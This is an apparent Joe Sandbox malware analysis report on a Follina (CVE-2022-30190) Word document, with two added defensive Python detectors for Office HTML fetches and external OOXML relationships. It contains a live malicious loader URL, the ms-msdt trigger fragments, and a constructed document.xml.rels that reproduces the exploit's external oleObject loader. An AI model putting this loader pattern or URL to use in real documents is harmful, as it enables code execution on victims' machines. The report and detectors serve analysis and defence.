Windows Analysis Report
MuUeMZphCk.docx

Overview

General Information

Sample Name: MuUeMZphCk.docx
Analysis ID: 794514
MD5: cda4155d33b715f31315a9247d56ed3d
SHA1: 7a495ae1b4c9132d0afb9b058e049cc71c5a5a55
SHA256: 62243a041c28b5f98f0d29780250bf83e61a85523ddce855745f94d381006615
Tags: CVE-2022-30190, docx

Detection

Follina CVE-2022-30190
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 764 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Yara matches on the sample:

Source: document.xml.rels
Rule: SUSP_Doc_WordXMLRels_May22
Description: Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard, Wojciech Cieslak
Strings:
  • 0x39:$a1: <Relationships
  • 0x2c1:$a2: TargetMode="External"
  • 0x2b9:$x1: .html!
Source: document.xml.rels
Rule: INDICATOR_OLE_RemoteTemplate
Description: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Author: ditekSHen
Strings:
  • 0x26e:$olerel: relationships/oleObject
  • 0x287:$target1: Target="http
  • 0x2c1:$mode: TargetMode="External
Yara matches on the network capture:

Source: sslproxydump.pcap
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x16ad:$a: PCWDiagnostic
  • 0x16a1:$sa3: ms-msdt
  • 0x1701:$sb3: IT_BrowseForFile=

Source: sslproxydump.pcap
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x1690:$re1: location.href = "ms-msdt:

Source: sslproxydump.pcap
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
Yara matches on dropped files:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x729:$a: PCWDiagnostic
  • 0x71d:$sa3: ms-msdt
  • 0x77d:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x70c:$re1: location.href = "ms-msdt:

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x729:$a: PCWDiagnostic
  • 0x71d:$sa3: ms-msdt
  • 0x77d:$sb3: IT_BrowseForFile=

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x70c:$re1: location.href = "ms-msdt:
No Sigma rule has matched

Snort IDS alert:
Timestamp: 01/30/23-16:38:59.237228
Source IP: 195.201.110.47
Destination IP: 192.168.2.22
SID: 2036726
Source Port: 443
Destination Port: 49176
Protocol: TCP
Classtype: Attempted User Privilege Gain


      AV Detection

Source: MuUeMZphCk.docx, Avira: detected
Source: MuUeMZphCk.docx, ReversingLabs: Detection: 46%
Source: MuUeMZphCk.docx, Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, Avira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPED
Source: document.xml.rels, Extracted files from sample: http://baza-novostei.name/dir/info/priny/t.html!
Source: unknown, HTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown, HTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: global traffic, DNS query: name: baza-novostei.name

      Networking

Source: Traffic, Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 195.201.110.47:443 -> 192.168.2.22:49176
Source: global traffic, HTTP traffic detected:
  GET /dir/info/priny/t.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: baza-novostei.name
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected (conditional re-request):
  GET /dir/info/priny/t.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  Host: baza-novostei.name
  Connection: Keep-Alive
  If-Modified-Since: Sun, 29 Jan 2023 13:29:26 GMT
  If-None-Match: "63d674b6-18c0"
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View, JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr, String found in binary or memory: http://baza-novostei.name/dir/info/priny/t.html
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr, String found in binary or memory: http://baza-novostei.name/dir/info/priny/t.htmlyX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87D8FFE7-04E6-4C98-8E49-7EEE49FEBDC8}.tmp
Source: unknown, DNS traffic detected: queries for: baza-novostei.name
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-AliveIf-Modified-Since: Sun, 29 Jan 2023 13:29:26 GMTIf-None-Match: "63d674b6-18c0"
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49176 version: TLS 1.2
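The GET requests above are the loader fetch: WINWORD.EXE itself, identified by the "ms-office; MSOffice 14" tail of its User-Agent, retrieves an HTML page from the domain named in document.xml.rels, and one of the four requests is a conditional re-fetch (If-None-Match / If-Modified-Since) of a copy Word already cached. The following added example, which is not part of the Joe Sandbox report, turns that observation into a proxy-log detection: it parses a raw HTTP/1.1 request head and raises an alert when an Office user agent GETs an .html/.htm resource. The request texts are constructed for the demo and modelled on the captured ones; the alert field names are this example's own choice.

```python
"""Detection over captured HTTP request heads: Office user agent fetching HTML.

Added example, not Joe Sandbox code. The sample requests are constructed and
modelled on the GETs the report captured (the User-Agent is the one Word 2010
sends, ending in "ms-office; MSOffice 14"). The rule: a GET whose User-Agent
identifies an Office application and whose path ends in .html/.htm is flagged,
because that is the shape of the loader fetch in Follina / CVE-2022-30190 and
of remote-template retrieval. Alert field names are this example's own.
"""
import re
from typing import Optional

HTML_SUFFIXES = (".html", ".htm")
OFFICE_UA = re.compile(r"ms-office", re.IGNORECASE)      # marker Office appends to its UA
OFFICE_VERSION = re.compile(r"MSOffice (\d+)")           # e.g. "MSOffice 14" for Office 2010


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request head into method, path, version and a header dict."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def office_html_fetch_alert(raw: str) -> Optional[dict]:
    """Return an alert dict when an Office UA GETs an HTML resource, else None."""
    req = parse_request(raw)
    headers = req["headers"]
    ua = headers.get("user-agent", "")
    path = req["path"].split("?", 1)[0]  # ignore any query string when checking the suffix
    if req["method"] != "GET" or not OFFICE_UA.search(ua):
        return None
    if not path.lower().endswith(HTML_SUFFIXES):
        return None
    version = OFFICE_VERSION.search(ua)
    return {
        "host": headers.get("host", ""),
        "path": path,
        "office_version": int(version.group(1)) if version else None,
        # Word revalidates a cached copy with If-None-Match / If-Modified-Since, so a
        # revalidation means the same HTML was already fetched at least once before.
        "revalidation": "if-none-match" in headers or "if-modified-since" in headers,
    }


def triage(requests) -> list:
    """Run the rule over many request heads and keep only the alerts."""
    return [alert for alert in map(office_html_fetch_alert, requests) if alert]


# Constructed sample input, modelled on the requests in the report.
WORD_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
           ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
           "Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")

FIRST_FETCH = (
    "GET /dir/info/priny/t.html HTTP/1.1\n"
    "Accept: */*\n"
    f"User-Agent: {WORD_UA}\n"
    "UA-CPU: AMD64\n"
    "Accept-Encoding: gzip, deflate\n"
    "Host: baza-novostei.name\n"
    "Connection: Keep-Alive\n"
)
REVALIDATION = FIRST_FETCH + (
    "If-Modified-Since: Sun, 29 Jan 2023 13:29:26 GMT\n"
    'If-None-Match: "63d674b6-18c0"\n'
)
# A browser fetching the same page is not an Office fetch and must not alert.
BROWSER_FETCH = (
    "GET /dir/info/priny/t.html HTTP/1.1\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/109.0\n"
    "Host: baza-novostei.name\n"
)

if __name__ == "__main__":
    for alert in triage([FIRST_FETCH, REVALIDATION, BROWSER_FETCH]):
        print(alert)
```

The rule deliberately keys on the User-Agent rather than on the destination: the domain is sample-specific, whereas an Office process pulling HTML over HTTP is rare enough in most environments to review every time. Whitelist known template or SharePoint hosts per site rather than loosening the rule.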

      System Summary

Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: sslproxydump.pcap, type: PCAP | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MuUeMZphCk.docx | ReversingLabs: Detection: 46%
Source: MuUeMZphCk.docx | Virustotal: Detection: 50%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: MuUeMZphCk.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\MuUeMZphCk.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$UeMZphCk.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5A4F.tmp
Source: classification engine | Classification label: mal96.expl.evad.winDOCX@1/20@7/1
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
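The two rule hits on document.xml.rels (SUSP_Doc_WordXMLRels_May22 and INDICATOR_OLE_RemoteTemplate) are purely static: the sample carries no macro (vbamacros = False), and what gives it away is a Relationship entry with TargetMode="External" whose Target is an http URL ending in ".html!", referenced by an oleObject relationship. The following added example, which is not Joe Sandbox code and not the YARA rules themselves, reproduces that check in Python so the same triage can run before a file ever reaches a sandbox: it unzips the OOXML package, parses every .rels part, and reports external relationships that match either indicator. The .docx it scans is constructed in memory for the demo, with its Target modelled on the URL the report extracted from document.xml.rels; the finding field names are this example's own.

```python
"""Static triage of an OOXML package for Follina-style external relationships.

Added example; not Joe Sandbox code and not the YARA rules named in the report.
It checks every .rels part of a .docx for the two static indicators those rules
key on: a Relationship with TargetMode="External" whose Target ends in ".html!"
(SUSP_Doc_WordXMLRels_May22) and an oleObject relationship whose Target lies
outside the package (INDICATOR_OLE_RemoteTemplate). The .docx scanned below is
constructed in memory for the demo; its Target is modelled on the URL the report
extracted from document.xml.rels. Finding field names are this example's own.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{RELS_NS}}}Relationship"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"


def scan_docx_relationships(docx_bytes: bytes) -> list:
    """Return one finding per suspicious external relationship in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter(REL_TAG):
                # Only External targets can leave the package; internal parts are not a loader.
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                reasons = []
                if rtype == OLE_TYPE:
                    reasons.append("oleObject relationship resolved from an external Target")
                if target.lower().endswith(".html!"):
                    reasons.append('Target ends in ".html!" (Follina loader pattern)')
                if reasons:
                    findings.append({
                        "part": part,
                        "id": rel.get("Id"),
                        "type": rtype.rsplit("/", 1)[-1],
                        "target": target,
                        "reasons": reasons,
                    })
    return findings


def build_docx(document_rels: str) -> bytes:
    """Assemble a minimal .docx (constructed test input) around the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                     '<Default Extension="xml" ContentType="application/xml"/>'
                     '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
                     '</Types>')
        pkg.writestr("_rels/.rels",
                     f'<Relationships xmlns="{RELS_NS}">'
                     '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
                     '</Relationships>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        pkg.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


# Constructed document.xml.rels modelled on the Follina sample in the report.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
<Relationship Id="rId5" Type="{OLE_TYPE}" Target="http://baza-novostei.name/dir/info/priny/t.html!" TargetMode="External"/>
</Relationships>"""

# A plain hyperlink is also TargetMode="External" and must not be flagged on that alone.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
<Relationship Id="rId2" Type="{HYPERLINK_TYPE}" Target="https://example.com/index.html" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for finding in scan_docx_relationships(build_docx(MALICIOUS_RELS)):
        print(finding)
    print("benign:", scan_docx_relationships(build_docx(BENIGN_RELS)))
```

To run it over a real file, pass `open(path, "rb").read()` to `scan_docx_relationships`. The scanner keys on the relationship Type and on the trailing "!" rather than on TargetMode="External" alone, because hyperlinks and linked images are legitimately external; an oleObject or attachedTemplate that resolves off-package is what needs a human look.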

      Persistence and Installation Behavior

Source: document.xml.rels | Extracted files from sample: http://baza-novostei.name/dir/info/priny/t.html!
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
MITRE ATT&CK Matrix

Listed per tactic column. A number in parentheses is the count of report signatures mapped to that technique; techniques without a number had no hits.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Exploitation for Client Execution (13); Scheduled Task/Job; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading (1); Rootkit; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: File and Directory Discovery (1); System Information Discovery (2); Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Ingress Tool Transfer (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud
Antivirus, initial sample (Source | Detection | Scanner | Label):
MuUeMZphCk.docx | 46% | ReversingLabs | Document-Word.Exploit.CVE-2022-30190
MuUeMZphCk.docx | 51% | Virustotal |
MuUeMZphCk.docx | 100% | Avira | W97M/Dldr.Agent.G1
Antivirus, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm | 100% | Avira | JS/CVE-2022-30190.G
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm | 100% | Avira | JS/CVE-2022-30190.G
No Antivirus matches
No Antivirus matches
Antivirus, URLs (Source | Detection | Scanner | Label):
https://baza-novostei.name/dir/info/priny/t.html | 0% | Avira URL Cloud | safe
http://baza-novostei.name/dir/info/priny/t.htmlyX | 0% | Avira URL Cloud | safe
http://baza-novostei.name/dir/info/priny/t.html | 0% | Avira URL Cloud | safe
https://baza-novostei.name/dir/info/priny/t.html | 3% | Virustotal |
http://baza-novostei.name/dir/info/priny/t.html | 0% | Virustotal |
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
baza-novostei.name | 195.201.110.47 | true | true | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://baza-novostei.name/dir/info/priny/t.html | true | Virustotal 3%; Avira URL Cloud: safe | unknown
http://baza-novostei.name/dir/info/priny/t.html | true | Virustotal 0%; Avira URL Cloud: safe | unknown
